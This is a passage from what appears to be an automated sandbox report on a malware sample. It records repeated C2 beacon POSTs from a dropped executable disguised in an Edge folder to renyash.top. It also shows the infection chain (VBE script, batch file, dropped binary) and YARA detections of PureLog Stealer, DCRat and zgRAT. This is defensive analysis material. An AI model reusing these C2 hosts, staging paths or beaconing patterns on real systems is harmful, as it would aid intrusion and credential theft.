                                                                                                                      Date: Fri, 20 Dec 2024 20:18:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      53192.168.2.44992837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:01.594738960 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:01.941922903 CET2644OUTData Raw: 58 58 5f 5e 5d 5f 54 54 5a 5b 5b 52 55 5f 51 51 58 58 59 45 52 52 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_^]_TTZ[[RU_QQXXYERRTT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">.?30=6X994%>/X'%R("/%8,6")$.#G!"^,
                                                                                                                      Dec 20, 2024 21:19:02.879728079 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:03.112612963 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      54192.168.2.44993537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:03.360683918 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:03.707406044 CET2644OUTData Raw: 5d 5b 5f 56 58 5e 54 52 5a 5b 5b 52 55 53 51 56 58 5e 59 40 52 54 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_VX^TRZ[[RUSQVX^Y@RTTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G)4=2'&_.: :('#X'8(2W&$!!V3>#G!"^,7
                                                                                                                      Dec 20, 2024 21:19:04.631318092 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:04.864053965 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      55192.168.2.44994037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:05.107431889 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:05.458259106 CET2644OUTData Raw: 58 5e 5f 57 58 59 54 52 5a 5b 5b 52 55 53 51 5d 58 5a 59 49 52 52 54 5b 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X^_WXYTRZ[[RUSQ]XZYIRRT[][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@*7]=&3:95_#*"Y)B 35(1/U'83#2&0>#G!"^,7
                                                                                                                      Dec 20, 2024 21:19:06.383505106 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:06.616213083 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      56192.168.2.44994637.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:06.856707096 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:07.207386017 CET2644OUTData Raw: 58 58 5a 54 5d 5f 54 50 5a 5b 5b 52 55 54 51 54 58 5c 59 46 52 5c 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XXZT]_TPZ[[RUTQTX\YFR\T^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">.+Y? =Z'=*.(& *^>B;0!?&3""'#G!"^,+
                                                                                                                      Dec 20, 2024 21:19:08.127427101 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:08.364594936 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      57192.168.2.44994937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:08.610519886 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:08.957770109 CET2644OUTData Raw: 58 5f 5a 53 58 5b 54 50 5a 5b 5b 52 55 56 51 57 58 5b 59 47 52 54 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X_ZSX[TPZ[[RUVQWX[YGRTT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=>7Z)0=['9::#**$83^5?,%;"1=0#G!"^,#
                                                                                                                      Dec 20, 2024 21:19:09.881637096 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:10.116483927 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:08 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      58192.168.2.44995437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:10.362140894 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:10.737970114 CET2644OUTData Raw: 5d 59 5a 55 5d 5a 54 56 5a 5b 5b 52 55 54 51 5d 58 5d 59 46 52 54 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]YZU]ZTVZ[[RUTQ]X]YFRTT^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A+>?>0%3>=.]#\-*4+X%8(Q&05$.#G!"^,+
                                                                                                                      Dec 20, 2024 21:19:10.990228891 CET1236OUTData Raw: 0a 1e 2d 26 02 05 07 5f 3f 03 01 20 08 06 26 1f 0f 22 3d 06 09 0e 57 1a 3e 29 3f 22 3b 2d 32 25 3a 00 5a 35 3c 29 0d 3c 30 1c 03 07 08 33 17 3e 24 0a 52 32 13 33 32 1e 3b 0a 26 38 2a 01 0a 19 27 33 2a 23 3b 3d 08 5f 30 38 0c 5e 0f 38 22 13 36 1c
                                                                                                                      Data Ascii: -&_? &"=W>)?";-2%:Z5<)<03>$R232;&8*'3*#;=_08^8"64:8]5<0*)'19278)5::,91<,]3$_\480,7?-W+ $-=+02XA>1^:=0 ]<<0 =V1<=,?,-W"27>U7_],;4?2@?^?#(9):+Q9;<P*:4
                                                                                                                      Dec 20, 2024 21:19:11.634597063 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:11.872221947 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      59192.168.2.44996137.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:12.122773886 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:12.473037958 CET2644OUTData Raw: 5d 5c 5f 52 5d 58 54 55 5a 5b 5b 52 55 50 51 5c 58 58 59 48 52 56 54 5b 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\_R]XTUZ[[RUPQ\XXYHRVT[][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A=0>!Y&.%:! 9)3>("''(0Z!!=S$#G!"^,
                                                                                                                      Dec 20, 2024 21:19:13.391532898 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:13.625479937 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      60192.168.2.44996937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:19:13.884423018 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:15.155226946 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:19.673058033 CET2644OUTData Raw: 58 51 5f 56 5d 59 54 55 5a 5b 5b 52 55 51 51 54 58 5c 59 40 52 57 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XQ_V]YTUZ[[RUQQTX\Y@RWT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@>>0=%X'*^9;94*%(7?0%R<;V18,Y6"%S0#G!"^,?
                                                                                                                      Dec 20, 2024 21:19:20.148821115 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:15:17:07
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\8k1e14tjcx.exe"
                                                                                                                      Imagebase:0xe90000
                                                                                                                      File size:2'365'778 bytes
                                                                                                                      MD5 hash:517D21CBE45C2A88930AA345C2A5C36B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe"
                                                                                                                      Imagebase:0x1f0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                                                                                                      Imagebase:0x240000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:15:17:08
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\ChainagentComponent/ChainFontruntimeCrt.exe"
                                                                                                                      Imagebase:0x210000
                                                                                                                      File size:2'043'904 bytes
                                                                                                                      MD5 hash:64105CB19AC25A6275C7D929937090A0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat"
                                                                                                                      Imagebase:0x7ff7f7f10000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:chcp 65001
                                                                                                                      Imagebase:0x7ff638340000
                                                                                                                      File size:14'848 bytes
                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:15:17:13
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:ping -n 10 localhost
                                                                                                                      Imagebase:0x7ff699850000
                                                                                                                      File size:22'528 bytes
                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:15:17:22
                                                                                                                      Start date:20/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"
                                                                                                                      Imagebase:0x580000
                                                                                                                      File size:2'043'904 bytes
                                                                                                                      MD5 hash:64105CB19AC25A6275C7D929937090A0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 83%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:9.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:9.3%
                                                                                                                        Total number of Nodes:1503
                                                                                                                        Total number of Limit Nodes:43
